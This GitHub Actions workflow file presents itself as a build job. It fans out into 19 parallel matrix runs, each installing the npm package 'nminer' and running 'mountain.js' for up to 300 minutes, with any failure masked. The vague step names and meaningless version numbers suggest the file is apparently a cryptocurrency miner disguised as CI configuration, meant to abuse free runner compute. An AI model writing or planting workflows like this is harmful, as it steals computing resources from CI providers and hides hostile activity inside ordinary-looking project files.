name: mountain
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2872 }
          - { version: 7071 }
          - { version: 2428 }
          - { version: 2034 }
          - { version: 3018 }
          - { version: 2431 }
          - { version: 987 }
          - { version: 6414 }
          - { version: 7991 }
          - { version: 3233 }
          - { version: 6602 }
          - { version: 1567 }
          - { version: 6356 }
          - { version: 6497 }
          - { version: 1504 }
          - { version: 3545 }
          - { version: 2462 }
          - { version: 2909 }
          - { version: 3623 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: questionable intently
        run: |
          npm install nminer@latest
          timeout 300m node mountain.js || echo "mountain executed"